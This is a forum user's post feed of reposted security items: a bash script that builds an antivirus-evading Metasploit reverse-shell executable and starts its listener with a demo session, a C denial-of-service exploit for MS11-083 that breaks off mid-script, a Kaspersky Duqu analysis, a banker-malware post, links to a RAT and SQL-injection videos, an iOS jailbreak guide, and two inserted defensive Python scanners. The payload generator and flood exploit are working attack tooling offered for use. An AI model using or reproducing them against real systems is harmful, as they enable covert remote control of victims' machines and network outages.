Everything posted by Nytro

  1. FUD Payload Generator for Backtrack

     Today, based on Astr0baby's article on how we can create a fully undetectable metasploit payload, I modified his REVERSE_TCP Payload Generator in order to work with the Backtrack 5 distro. Below you can find the modified version and a simple presentation of how it works:

        #!/bin/bash
        echo "************************************************************"
        echo " Automatic shellcode generator - FOR METASPLOIT "
        echo " By Astr0baby 2011 "
        echo " With some Randomic gravy and sauce to bypass Antivirus "
        echo " For Automatic Teensy programming and deployment "
        echo "************************************************************"
        rm -rf ShellCode
        echo "Here is a network device list available on yor machine"
        cat /proc/net/dev | tr -s ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
        echo -e "What network interface are we gonna use ? \c"
        read interface
        echo -e "What Port Number are we gonna listen to? : \c"
        read port
        echo -e "Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : \c"
        read seed
        echo -e "And lastly how many times do we want to encode our payloads 1-20? : \c"
        read enumber
        # Get OS name
        OS=`uname`
        IO=""
        # store IP
        case $OS in
        Linux) IP=`ifconfig $interface | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
        *) IP="Unknown";;
        esac
        #echo "$IP"
        ./msfpayload windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x86/shikata_ga_nai -c $enumber -t raw | ./msfencode -e x86/jmp_call_additive -c $enumber -t raw | ./msfencode -e x86/call4_dword_xor -c $enumber -t raw | ./msfencode -e x86/shikata_ga_nai -c $enumber > test.c
        mkdir ShellCode
        mv test.c ShellCode
        cd ShellCode
        #Replacing plus signs at the end of line
        sed -e 's/+/ /g' test.c > clean.c
        sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
        echo "#include <stdio.h>" >> temp
        echo 'unsigned char ufs[]=' >> temp
        for (( i=1; i<=10000;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp2
        sed -i 's/$/"/' temp2
        sed -i 's/^/"/' temp2
        echo ';' >> temp2
        cat temp2 >> temp
        cat ready.c >> temp
        mv temp ready2.c
        echo ";" >> ready2.c
        echo "int main(void) { ((void ())micro)();}" >> ready2.c
        mv ready2.c final.c
        echo 'unsigned char tap[]=' > temp3
        for (( i=1; i<=999999;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp4
        sed -i 's/$/"/' temp4
        sed -i 's/^/"/' temp4
        echo ';' >> temp4
        cat temp4 >> temp3
        cat temp3 >> final.c
        #Cleanup
        rm -f clean.c
        rm -f test.c
        rm -f ready.c
        rm -f rand.c
        rm -f temp2
        rm -f temp3
        rm -f temp4
        /usr/bin/i586-mingw32msvc-gcc -Wall ./final.c -o ./final.exe > /dev/null 2>&1
        mv final.exe $RANDOM.exe
        filex=`ls -ct1 | head -1`
        sumx=`sha1sum $filex`
        echo $filex "...generated in ShellCode subfolder"
        echo $filex "sha1checksum is .." $sumx
        strip --strip-debug $filex
        cd ..
        echo " starting the meterpreter listener..."
        sleep 2
        ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port AutoRunScript=' migrate2 explorer.exe' E

     In order to be able to compile the generated payload we must install the following packages:

        root@bt:~# apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

     After the installation we must move our shell script to metasploit's default folder (/pentest/exploits/framework) and execute it:

        root@bt:/pentest/exploits/framework# chmod +x fud.sh
        root@bt:/pentest/exploits/framework# ./fud.sh
        ************************************************************
         Automatic shellcode generator - FOR METASPLOIT
         By Astr0baby 2011
         With some Randomic gravy and sauce to bypass Antivirus
         For Automatic Teensy programming and deployment
        ************************************************************
        Here is a network device list available on yor machine
        lo:
        eth0:
        What network interface are we gonna use ? eth0
        What Port Number are we gonna listen to? : 443
        Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : 6000
        And lastly how many times do we want to encode our payloads 1-20? : 5
        [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
        [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
        [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
        [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
        [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
        [*] x86/jmp_call_additive succeeded with size 457 (iteration=1)
        [*] x86/jmp_call_additive succeeded with size 489 (iteration=2)
        [*] x86/jmp_call_additive succeeded with size 521 (iteration=3)
        [*] x86/jmp_call_additive succeeded with size 553 (iteration=4)
        [*] x86/jmp_call_additive succeeded with size 585 (iteration=5)
        [*] x86/call4_dword_xor succeeded with size 614 (iteration=1)
        [*] x86/call4_dword_xor succeeded with size 642 (iteration=2)
        [*] x86/call4_dword_xor succeeded with size 670 (iteration=3)
        [*] x86/call4_dword_xor succeeded with size 698 (iteration=4)
        [*] x86/call4_dword_xor succeeded with size 726 (iteration=5)
        [*] x86/shikata_ga_nai succeeded with size 753 (iteration=1)
        [*] x86/shikata_ga_nai succeeded with size 780 (iteration=2)
        [*] x86/shikata_ga_nai succeeded with size 807 (iteration=3)
        [*] x86/shikata_ga_nai succeeded with size 834 (iteration=4)
        [*] x86/shikata_ga_nai succeeded with size 861 (iteration=5)
        20210.exe ...generated in ShellCode subfolder
        20210.exe sha1checksum is .. c69699927e61dbef37423c852cebcd40f883df2b 20210.exe
         starting the meterpreter listener...

     Since we have created our payload we will try to check if it works:

        root@bt:/pentest/exploits/framework/ShellCode# wine 24382.exe
        fixme:system:SetProcessDPIAware stub!
        fixme:dwmapi:DwmIsCompositionEnabled 0x33cfdc
        fixme:file:MoveFileWithProgressW MOVEFILE_WRITE_THROUGH unimplemented
        fixme:advapi:SetNamedSecurityInfoW L"C:\\windows\\system32\\gecko\\1.0.0\\wine_gecko\\components\\xpti.dat" 1 536870916 (nil) (nil) 0x1b3d42c (nil)
        fixme:iphlpapi:NotifyAddrChange (Handle 0xa62e8d8, overlapped 0xa62e8e0): stub
        fixme:file:MoveFileWithProgressW MOVEFILE_WRITE_THROUGH unimplemented
        fixme:advapi:SetNamedSecurityInfoW L"C:\\windows\\system32\\gecko\\1.0.0\\wine_gecko\\components\\compreg.dat" 1 536870916 (nil) (nil) 0x1c18b0c (nil)
        wine: configuration in '/root/.wine' has been updated.
        fixme:toolhelp:CreateToolhelp32Snapshot Unimplemented: heap list snapshot
        fixme:toolhelp:Heap32ListFirst : stub
        PAYLOAD => windows/meterpreter/reverse_tcp
        LHOST => 192.168.200.22
        LPORT => 443
        AutoRunScript => migrate2 explorer.exe
        [*] Started reverse handler on 192.168.200.22:443
        [*] Starting the payload handler...
        [*] Sending stage (752128 bytes) to 192.168.200.22
        [*] Meterpreter session 1 opened (192.168.200.22:443 -> 192.168.200.22:55865) at 2011-11-09 22:48:24 +0200

        meterpreter > ps

        Process list
        ============

         PID  Name            Arch  Session  User                      Path
         ---  ----            ----  -------  ----                      ----
         12   services.exe    x86   0        NT AUTHORITY\INTERACTIVE  C:\windows\system32\services.exe
         17   explorer.exe    x86   0        NT AUTHORITY\INTERACTIVE  C:\windows\system32\explorer.exe
         33   winedevice.exe  x86   0        NT AUTHORITY\INTERACTIVE  C:\windows\system32\winedevice.exe
         8    24382.exe       x86   0        NT AUTHORITY\INTERACTIVE  Z:\pentest\exploits\framework\ShellCode\24382.exe

        meterpreter > sysinfo
        Computer        : bt
        OS              : Windows XP (Build 2600, Service Pack 3).
        Architecture    : x86
        System Language : en_US
        Meterpreter     : x86/win32

     Now our payload is fully undetectable by most antivirus engines. Of course we can try to scan it using online services such as novirusthanks:

     Credits go to Astr0baby

     Source: http://www.coresec.org/2011/11/09/fud-payload-generator-for-backtrack/
  2. SQL Injection basics

     Authors: Xhabie-Crew

     Sql Injection With Sqlmap
     http://www.securitytube.net/video/2435

     Sql Injection (Step By Step)
     http://www.securitytube.net/video/2438

     Bypass Login With Sql Injection
     http://www.securitytube.net/video/2439

     Note: these are not tutorials you "learn" something from, they are purely demonstrative. That is, this is NOT how you learn SQL Injection.
  3. The Duqu Saga Continues: Enter Mr. B. Jason and TV's Dexter

     Aleks
     Kaspersky Lab Expert
     Posted November 11, 12:09 GMT
     Tags: Duqu, Microsoft Word, Targeted Attacks, Vulnerabilities and exploits, Zero-day vulnerabilities, Stuxnet 0.5

     As we informed you earlier, we've recently been conducting an investigation into a number of incidents in connection with a Duqu trojan infection. Thankfully we've been able to make some headway in getting to the bottom of Duqu and putting together several of the previously absent components without which it has been difficult to understand what's actually been going on.

     First things first, we would like to express our sincere thanks to the specialists at CERT Sudan. They've been providing us with priceless assistance in our investigation, and showed the utmost professionalism - in full accordance with the values and aims of any CERT around the world. Our cooperation with the Sudanese CERT is ongoing and will cover another three incidents found in the country.

     Our main achievement has been in the investigation of the incident deemed No.#1, described in my second post about Duqu. We managed to not only locate all the previously undiscovered files of this variant of Duqu, but also to find both the source of the infection and the file dropper that contains the vulnerability exploit in win32k.sys (CVE-2011-3402).

     Comparing the data we uncovered with that obtained by other researchers and antivirus companies, we've elicited various common traits that have revealed the approximate timeline and overall methods used by Duqu's authors. The dates of the incident correlate with the history of discovery in Iran of a virus called Stars. At that time Iranian specialists didn't share samples of the discovered virus with any of the anti-virus companies, and this, it has to be said, was a serious mistake, which gave rise to all subsequent events in this saga. Most probably, the Iranians found a keylogger module that had been loaded onto a system and which contained a photo of the NGC 6745 galaxy. This could explain the title Stars given to it.

     It's possible that the Iranian specialists found just the keylogger, while the main Duqu module and the dropper (including the documents that contained the then-unknown vulnerability) may have gone undetected.

     Stage 1: Penetration, E-mail

     The attack took place on a pre-selected target. For obvious reasons, we can't reveal the name of the company that was targeted in incident No.#1. Like with the incident investigated by CrySyS Lab, the attack was launched via e-mail. The object was attacked twice - on April 17 and 21, 2011. The first attempt turned out to be unsuccessful (the e-mail from the attackers wound up in the junk folder), after which they repeated the attack four days later, amending the subject line of the e-mail slightly. Mr. B. Jason sure was dedicated and persistent. It wasn't a mass spam mail-out, since both the subject and the name of the file mentioned the attacked company specifically. Both times the e-mail was sent from one and the same IP address, based in Seoul, South Korea. We reckon that this computer was infected earlier by some kind of malicious program and was used unknowingly (to its owner) as a proxy.

     The second attack turned out successful: the addressee opened the attached DOC file that contained the vulnerability exploit and Trojan installer. The attackers used an interesting ruse at this stage. After the addressee opened the file the exploit started its work: it became active, residing in the memory, but did nothing! Meanwhile, both the original file and Word itself could have been closed. This period of inactivity lasted around ten minutes, after which the exploit waited for the user's activity to stop (no keyboard or mouse activity). Only then did the dropper kick into action. The variant of the dropper that we found differs somewhat from the dropper found by the Hungarian laboratory CrySyS and described by Symantec.

     However, these differences relate mainly to sizes and dates of creation of the component upon a tiny change to the code. The overall arrangement at this stage looked like this:

        Exploit -> kernel -> driver in kernel -> loader dll in services.exe -> big pnf in services.exe -> big pnf installing from lsass or AV process.

     The shellcode of the exploit was contained in an embedded font processed by the win32k.sys system. The font was called Dexter Regular, and its creators were shown as Showtime Inc. This is another prank pulled by the Duqu authors, since Showtime Inc. is the cable broadcasting company behind the TV series Dexter, about a CSI doctor who happens also to be a serial killer who avenges criminals in some post-modern perversion of Charles Bronson's character in Death Wish.

     The driver loaded by the exploit into the kernel of the system had a compilation date of August 31, 2007. The analogous driver found in the dropper from CrySyS was dated February 21, 2008. If this information is correct, then the authors of Duqu must have been working on this project for over four years!

     The driver loaded into the services.exe process a library, which was also located in the body of the exploit - the main module of the dropper - and ran its code.
     At this stage the dropper attempts to check the following key in the registry:

        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\"CF1D"

     It should be noted that in the document published by Symantec a CFID key is mentioned; however, this may be a typo.

     The dropper retrieves from its body the contents of the ".init" section in which there is a header with the magical identifier CIGH, plus extra settings, a PNF (.DLL), and a driver which gets installed on the system. After unpacking the contents of the section, a test is carried out for correspondence of the current date with the range installed in the heading of the ".init" section of the dropper. If the date doesn't fall within that range, the Trojan is not installed. In our variant, this range was from August 17, 2010 to July 18, 2012. In the sample of the dropper found by CrySyS the range was different: August 17, 2005 to November 2, 2023.

     Next, the dropper loads the PNF (DLL) part and transfers control to the function exported as No.4. This function is responsible for the installation onto the system and the launch of the driver of the Trojan and encrypted library (PNF DLL), together with the configuration file. The configuration file contains the date of infection and the period of work of the Trojan in the system (by default - 30 days, but this period could change depending on commands from the control center).

     In this incident, as we assumed earlier, a unique set of files was used, which is different from earlier-known sets. The most important difference is that the main module of the Trojan (the PNF DLL file) had a creation date of April 17 - the same day as the first attack on the victim. This fact shows that the authors build a separate set of files for each specific victim, and do so right before the attack.

     The files we discovered amount to the following collection:

        Driver        Size    Date         Main DLL      Size     Date         Config
        adp55xx.sys   24960   03.11.2010   apd95xx.pnf   248320   17.04.2011   adp96xx.pnf

     The differences in size of the main DLL (they were found on different computers in one incident) are explained by the fact that, in the first variant of the DLL, the component interacting with the control center is stored in the PNF DLL as a resource numbered 302; and in the second variant this component is included in the compressed ".zdata" section of a loader library that is stored as resource 302. We assume that the compression took place upon forming the set for attacking a different computer on the network.

     The control server (C2) used in this set also differed from previously discovered ones in India and Belgium. In this incident the control center was situated in another country; however, we cannot publicly announce the data due to the ongoing nature of the investigation. Besides, we know of yet another control center used in a different incident; it too is currently being analyzed. This information shall be published shortly. This also seems to indicate that the attackers have used a separate C&C for each unique attack.

     Stage II: Collecting Info

     During our investigation of the incident it was established that two computers were compromised in one organization. The first of them was the source of infection from April 21; the second was compromised later, at the end of May. The infection of the second computer occurred via the local network. After infection of the system and establishing the link with the control server, it is clear that an extra module known as a keylogger was loaded and installed, which was able to collect information about the system, take screenshots, search for files, capture passwords, etc.

     To date, the existence of at least two variants of the given module has been confirmed - that found by CrySyS Lab (compilation date June 1, 2011) and that found by Symantec (compilation date August 10, 2011). We haven't been able to find a similar module in the given incident; however, we can announce that it existed as far back as May 2011.

     On both computers were found traces of the operation of a spy module, i.e., files named ~DFxxxxx.tmp (e.g., ~DF1EF83.tmp) and ~DQx.tmp (e.g., ~DQ2C6.tmp). The name format of the file ~DF[five hex digits] differs from the names of the temporary files created by MS Word, which use the format ~DF[four hex digits]. ~DF files contain a compressed identifier of the infected system and start with the line ABh91AY&SY. ~DQ files contain gathered information (lists of processes, screenshots, info about applications). These files are also compressed and contain a similar marker, differing by just one symbol: AEh91AY&SY.

     At present we do not know what module creates the ~DF files (the ~DQ files are created by the known spy module), or what their precise target is.

     On the first computer these files were dated April 27 - three days after the date of infection. On May 25, 2011, the spy module created the file ~DQ181.tmp. In it is contained information about the network neighborhood of the initially infected computer. On the next day, May 26, 2011, infection of the second computer in the network was recorded. On it was created the file identifier ~DF. What is interesting here is the fact that later on the second computer was created yet another ~DF file. This occurred on June 2, 2011. This date coincides with the date of compilation of the known spy module (June 1, 2011). It is possible that in this period of June 1-2 the authors of Duqu installed this new version of the module on all the infected computers via the C&C server. Traces of the work of this module are visible in the existence of file ~DQ4.tmp, created on June 29.

     We found three ~DQ-type files, created on May 25, June 29 and August 24. We noticed that all three dates are Wednesdays. This could be just a coincidence, maybe not. Still, based on this 'coincidence' it is possible to name the group behind Duqu as the Wednesday's Gang.

     The Trojan was present in the infection of systems from April 21 right up to the end of October 2011. Its configuration files were installed over at least a minimum of 121 days; the reinstallation of the main module occurred back at the end of June 2011. During all this time the attackers periodically installed new modules, infected other computers on the network, and collected information.

     Conclusion

     As part of the investigation of the given incident we've established the entry points for penetration of the systems, dates of events, and several facts regarding the conduct of the attackers. This information allows one to date one of the waves of attack to mid-to-late April 2011. Key findings include:

     - For every victim, a separate set of attack files was created;
     - Each unique set of files used a separate control server;
     - The attacks were conducted via e-mails with a .DOC file attached;
     - The mail-outs took place from anonymous mailboxes, probably via compromised computers;
     - At least one e-mail address is known from which the mail-outs were conducted - bjason1xxxx@xxxx.com;
     - For each victim, a separate DOC file was put together;
     - The vulnerability exploit was contained in the font called "Dexter Regular";
     - The attackers changed the shellcode, and varied the range of dates for possible infection;
     - After penetration into a system the attackers installed extra modules and infected neighboring computers;
     - The presence on the systems of the files ~DF.tmp and ~DQ.tmp unambiguously points to an infection by Duqu.

     Due to privacy reasons and protection of the identity of the victim, we cannot share the source .DOC file with other parties. Also, we are not at present disclosing the address of the control server for this variant of Duqu; however, we think that it is not functioning now and all critical information on it has already been deleted by the attackers. This is also the case for one more control server we have discovered. Information about the control servers will be published later.

     We can say that there are at least 12 unique sets of Duqu files known to us at present. The variant discussed in this post has been named variant F. Detailed information on the other variants will be published later.

     Source: http://www.securelist.com/en/blog/208193243/The_Duqu_Saga_Continues_Enter_Mr_B_Jason_and_TVs_Dexter
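The post's host-level indicators (the ~DF/~DQ markers, the five-hex-digit ~DF name that MS Word never produces, and the Zones\4 registry value the dropper checks) can be turned into a small triage scanner. This is an added example, not Kaspersky's code or tooling; the sample files are constructed, and the 1-5 digit length for ~DQ names and the "suspicious-name" verdict are my assumptions.

```python
import os
import re
import tempfile

# Indicators quoted in the write-up above. ~DF files start with ABh91AY&SY,
# ~DQ files with a marker differing by one character, AEh91AY&SY.
DF_MARKER = b"ABh91AY&SY"   # ~DF*.tmp: compressed identifier of the infected system
DQ_MARKER = b"AEh91AY&SY"   # ~DQ*.tmp: gathered data (process lists, screenshots)

# Duqu ~DF names carry five hex digits; MS Word's own ~DF temp files carry four.
DUQU_DF_NAME = re.compile(r"^~DF[0-9A-F]{5}\.tmp$", re.IGNORECASE)
WORD_DF_NAME = re.compile(r"^~DF[0-9A-F]{4}\.tmp$", re.IGNORECASE)
# ~DQ names seen in the post: ~DQ4.tmp, ~DQ181.tmp, ~DQ2C6.tmp. The 1-5 digit
# range is my assumption; the post does not state a fixed length.
DUQU_DQ_NAME = re.compile(r"^~DQ[0-9A-F]{1,5}\.tmp$", re.IGNORECASE)

# Registry value the dropper checks; the post notes Symantec printed it as CFID.
DROPPER_REG_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion"
                   r"\Internet Settings\Zones\4")
DROPPER_REG_VALUES = {"CF1D", "CFID"}


def classify(name, head):
    """Verdict for one file from its base name and its first bytes."""
    if head.startswith(DF_MARKER):
        return "duqu-df"          # the marker alone is conclusive
    if head.startswith(DQ_MARKER):
        return "duqu-dq"
    if DUQU_DF_NAME.match(name) or DUQU_DQ_NAME.match(name):
        return "suspicious-name"  # right shape, no marker: pull the file for review
    if WORD_DF_NAME.match(name):
        return "word-temp"        # ordinary MS Word scratch file
    return "clean"


def scan_directory(path):
    """Map every regular file directly under `path` to its verdict."""
    verdicts = {}
    for entry in os.scandir(path):
        if entry.is_file():
            with open(entry.path, "rb") as fh:
                head = fh.read(len(DF_MARKER))
            verdicts[entry.name] = classify(entry.name, head)
    return verdicts


def suspicious_registry_values(value_names):
    """Given value names exported from the Zones\\4 key, return those the dropper looks for."""
    return sorted(v for v in value_names if v.upper() in DROPPER_REG_VALUES)


def demo():
    """Write constructed sample files to a temp dir and scan them. Names and
    markers follow the post; the file bodies are made up."""
    samples = {
        "~DF1EF83.tmp": DF_MARKER + b"\x00" * 32,           # Duqu system identifier
        "~DQ2C6.tmp": DQ_MARKER + b"\x00" * 32,             # Duqu collected data
        "~DF1A2B.tmp": b"\xd0\xcf\x11\xe0" + b"\x00" * 32,  # four hex digits: Word temp
        "~DQ181.tmp": b"no marker here",                    # name matches, content does not
        "report.docx": b"PK\x03\x04" + b"\x00" * 32,
    }
    with tempfile.TemporaryDirectory() as workdir:
        for name, body in samples.items():
            with open(os.path.join(workdir, name), "wb") as fh:
                fh.write(body)
        return scan_directory(workdir)


if __name__ == "__main__":
    for name, verdict in sorted(demo().items()):
        print(f"{name:14s} {verdict}")
    print(suspicious_registry_values(["CF1D", "Flags", "cfid"]))
```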
  4. The Grace Programming Language Project

     SPLASH 2011: Andrew Black and James Noble - The Grace Programming Language Project

     Video: http://channel9.msdn.com/Blogs/Charles/SPLASH-2011-Andrew-Black-and-James-Noble-The-Grace-Programming-Language-Project

     The Grace Programming Language project is a research effort that aims to make learning how to program easier by baking "educational abstractions" into the language itself - it's an object oriented programming language designed for teaching undergraduate students. This means the language is designed from the ground up as a learning tool for novice adult programmers. The Grace PL project is led by Kim Bruce, Andrew Black, and James Noble. (Unfortunately, Kim was unable to take part in this conversation. Next time, Kim!)

     Here, we learn about the need for a programming language that targets novices and what a novice programming language looks like. What does a programming language for novices mean, exactly? How can it be simple enough (conceptually easy to use, to read, to understand) while remaining useful as a programming tool? Can't you learn how to program effectively using objects in an industrial strength general purpose programming language like C# or Java? What does Grace afford that the more feature-rich languages don't? Tune in. This is a fascinating research topic and one that should yield some very interesting practical results. Great work!

     Website: http://gracelang.org/
     Specification: http://gracelang.org/documents/grace-spec0132.pdf
  5. How to Jailbreak iPhone iOS 5

     Posted on November 11, 2011 by Carole Wozny

     Now that iOS 5.0.1 is available for download, we knew it was only a matter of days before a Jailbreak would be available for the new iOS. And we didn't have long to wait. A tethered jailbreak version of RedSn0w 0.9.9b8 is now available for download. For those of you who wish to wait for an untethered jailbreak, keep in mind that the jailbreak may not be available in the near future. Keep in mind that once you jailbreak your iPhone from iOS5, you may have no way of downgrading your iOS back to an earlier version, so make sure to back up everything on your iPhone first before you jailbreak it.

     How to Jailbreak iOS 5.0.1

     Note: You will need iOS 5.0 firmware (download here) to jailbreak with RedSn0w 0.9.9b8.

     Step 1: Install 5.0.1 Final.
     Step 2: Open RedSn0w 0.9.9b8 (download here) and select Extras > Specify Firmware > then point it to the iOS 5.0 firmware IPSW.
     Step 3: Go back to the main screen of RedSn0w and place your device into DFU mode. Click Jailbreak, and then select Install Cydia.
     Step 4: Your device should then jailbreak, but note that your Cydia icon will be white because it is a tethered jailbreak. To boot tethered you will need to place your device into DFU mode again.
     Step 5: From the main RedSn0w page, select Extras > Specify Firmware > and point it to the iOS 5.0 IPSW.
     Step 6: Choose "Just Boot" from RedSn0w's Extras menu, and it will perform a tethered boot.

     iOS 5.0.1 Final should now be fully jailbroken. If you're in need of a more in-depth RedSn0w guide, venture over to the RedSn0w page. Here is an excellent video tutorial from the idownloadblog.com site:

     Video: http://www.youtube.com/watch?v=L1d1sYJcQK8

     Source: http://koresecure.com/2011/11/11/how-to-jailbreak-iphone-ios-5/
  6. Steganography or encryption in bankers?

     Dmitry Bestuzhev
     Kaspersky Lab Expert
     Posted November 10, 10:34 GMT

     While looking over some potentially malicious links from Brazil, I came across an interesting group of files. They were of varying sizes but had similar structures. First I thought this was some type of steganography. The files had a jpeg extension, but were in fact bmp files in structure. It was evident that they contained encrypted malware and some additional data. After further analysis, I discovered that this was a block cipher. As far as I know, this is the first time it has been used by malware writers anywhere in Latin America.

     This is what the malicious program looked like after decryption:

     By using this technique, the virus creators kill several birds with one stone. Firstly, it may cause automatic malware analysis systems to function incorrectly: the file would be downloaded and analyzed by the antivirus program, and given the all-clear; with time the link will be exempted from checks altogether. Secondly, the administrators of the sites where such encrypted malicious files are hosted won't be able to identify them as malicious and will leave them as they are. Thirdly, some malware researchers may not have the time or necessary expertise to deal with them. All of this plays into the hands of the cybercriminals.

     We have observed that the virus writers behind this specific attack publish new mirrors with the files and new malware every 2 days or so. So far, the encryption algorithm has been the same, but I'm sure it will be changed after this post is published.

     This is the decryption script for the current status:

     Source: http://www.securelist.com/en/blog/208193235/Steganography_or_encryption_in_bankers

     Yes, a well thought-out job...
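The tell described in the post (a .jpg extension on a file whose structure is BMP, carrying an encrypted blob plus extra data) is cheap to check on a web host or a download proxy before any decryption is attempted. This is an added example, not the post's decryption script; the sample files are constructed, and the 7.5 bits/byte entropy threshold is my own heuristic, not a value from the post.

```python
import hashlib
import math
import struct

JPEG_MAGIC = b"\xff\xd8\xff"
BMP_MAGIC = b"BM"
ENTROPY_THRESHOLD = 7.5   # assumption: real bitmap pixels rarely approach 8 bits/byte


def shannon_entropy(data):
    """Bits of entropy per byte (0.0 for empty input, at most 8.0)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def inspect_image(name, data):
    """Findings for a file served under an image name, in a fixed order."""
    findings = []
    ext = name.rsplit(".", 1)[-1].lower()
    if ext in ("jpg", "jpeg") and not data.startswith(JPEG_MAGIC):
        findings.append("extension-magic-mismatch")
    if data.startswith(BMP_MAGIC) and len(data) >= 14:
        declared_size = struct.unpack_from("<I", data, 2)[0]   # BITMAPFILEHEADER.bfSize
        pixel_offset = struct.unpack_from("<I", data, 10)[0]   # BITMAPFILEHEADER.bfOffBits
        if len(data) > declared_size:
            # "some additional data" hung off the end of a bitmap that is otherwise well formed
            findings.append("trailing-data:%d" % (len(data) - declared_size))
        if shannon_entropy(data[pixel_offset:]) > ENTROPY_THRESHOLD:
            findings.append("high-entropy-body")   # pixel area looks like ciphertext
    return findings


def _bmp(pixels, width, height, extra=b""):
    """Build a minimal 24-bit BMP around `pixels`; `extra` is appended past the declared size."""
    info = struct.pack("<IiiHHIIiiII", 40, width, height, 1, 24, 0, len(pixels), 2835, 2835, 0, 0)
    size = 14 + len(info) + len(pixels)
    header = BMP_MAGIC + struct.pack("<IHHI", size, 0, 0, 14 + len(info))
    return header + info + pixels + extra


def _pseudo_random(n, seed=b"constructed"):
    """Deterministic high-entropy bytes standing in for an encrypted payload."""
    out, block = b"", seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return out[:n]


# Constructed samples: a real 2x2 bitmap, a real JPEG header, and the pattern from the post.
SAMPLES = {
    "logo.bmp": _bmp(b"\xff\xff\xff\x00\x00\x00\x00\x00" * 2, 2, 2),
    "banner.jpg": JPEG_MAGIC + b"\xe0\x00\x10JFIF\x00" + b"\x00" * 64,
    "foto.jpg": _bmp(_pseudo_random(3072), 64, 16, extra=_pseudo_random(200, b"trailer")),
}


def scan_samples():
    """Run the inspection over the constructed samples."""
    return {name: inspect_image(name, data) for name, data in SAMPLES.items()}


if __name__ == "__main__":
    for name, findings in scan_samples().items():
        print(f"{name:11s} {findings or 'ok'}")
```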
  7. Demonio RAT

     Site: Demonio - Browse Files at SourceForge.net
     Download: http://sourceforge.net/projects/demonio/
     http://sourceforge.net/projects/demonio/files/
  8. MS11-083 PoC winnuke2011.sh

        * ========================
        * This attempts to trigger the ICMP refCount overflow
        * in TCP/IP stack of Win7/Vista/Win2k8 hosts. This
        * requires sending 2^32 UDP packets to a host on a closed
        * port, or 4,294,967,296 packets. A dereference function
        * must be called that is not triggered via UDP but ICMP
        * echo packets. This exploit creates 250 threads and
        * floods a host with UDP packets and then attempts to
        * trigger the de-ref using ping. I calculated that it
        * would take approximately 52 days for the host to
        * enter a condition where this vulnerability is
        * triggerable.
        * ========================

        #!/bin/sh
        cat >> winnuke2011.c << EOF
        /*
         * MS11-083 DoS/PoC exploit
         * ========================
         * This attempts to trigger the ICMP refCount overflow
         * in TCP/IP stack of Win7/Vista/Win2k8 hosts. This
         * requires sending 2^32 UDP packets to a host on a closed
         * port, or 4,294,967,296 packets. A dereference function
         * must be called that is not triggered via UDP but ICMP
         * echo packets. This exploit creates 250 threads and
         * floods a host with UDP packets and then attempts to
         * trigger the de-ref using ping. I calculated that it
         * would take approximately 52 days for the host to
         * enter a condition where this vulnerability is
         * triggerable.
         *
         * -- prdelka
         */
        #include <stdio.h>
        #include <stdlib.h>
        #include <pthread.h>
        #include <sys/types.h>
        #include <sys/socket.h>
        #include <netinet/in.h>
        #include <arpa/inet.h>
        #include <netdb.h>
        #include <stdio.h>
        #include <unistd.h>
        #include <string.h>
        #include <sys/time.h>

        int port;
        int active = 0;
        pthread_mutex_t mutexactive;
        void *sendpackets(void *ptr);

        int main(int argc, char *argv[])
        {
            pthread_t thread;
            int iret,lthreads;
            pid_t pid;
            printf("[+] MS11-083 DoS/PoC exploit\n");
            if(argc<3){
                printf("[!] Usage : %s <server> <port>\n", argv[0]);
                exit(1);
            }
            char *const args[] = {"ping",argv[1],NULL};
            char *const envp[] = {"",NULL};
            port = atoi(argv[2]);
            for(lthreads=0;lthreads<250;lthreads++){//UDP flood
                iret = pthread_create(&thread,NULL,sendpackets,argv[1]);
                printf("[-] Thread number %d started\n",lthreads);
                sleep(1);
            }
            printf("[-] One does not simply barrel roll into Mordor\n");
            pid = fork();
            if(pid==0){// trigger deref.
                execve("./ping.sh",args,envp);
            };
            while(active){ }
            printf("[-] You are finished. Patience is a virtue.\n");
            exit(0);
        }

        void *sendpackets(void *ptr)
        {
            int sd, rc, n, echoLen, flags, error, timeOut;
            unsigned long i;
            struct sockaddr_in remoteServAddr;
            struct hostent *h;
            char str[41];
            pthread_mutex_lock(&mutexactive);
            active++;
            pthread_mutex_unlock(&mutexactive);
            srand(time(NULL));
            for (i = 0;i < 40;++i){
                str[i] = (char)((rand() % 78) + 30);
            }
            str[40] = '\0'; // yes this was off-by-one.
            printf("[-] Sending payload '%s'\n",str);
            h = gethostbyname(ptr);
            if(h==NULL) {
                printf("unknown host '%s' \n",(char*)ptr);
                exit(1);
            }
            remoteServAddr.sin_family = h->h_addrtype;
            memcpy((char *) &remoteServAddr.sin_addr.s_addr,h->h_addr_list[0], h->h_length);
            remoteServAddr.sin_port = htons(port);
            sd = socket(AF_INET,SOCK_DGRAM,0);
            if(sd<0){
                printf("[!] Cannot open socket\n");
                pthread_exit((void*)0);
            }
            flags = 0;
            for(i=0;i<4294967295;i++){
                rc = sendto(sd,str,strlen(str)+1,flags,(struct sockaddr *)&remoteServAddr,sizeof(remoteServAddr));
                if(rc<0){
                    printf("[!] Cannot send data\n");
                    close(sd);
                    pthread_exit((void*)0);
                }
            }
            pthread_mutex_lock(&mutexactive);
            active--;
            pthread_mutex_unlock(&mutexactive);
            pthread_exit(NULL);
        }
        EOF
        cat >> ping.sh << EOF
        #!/bin/sh
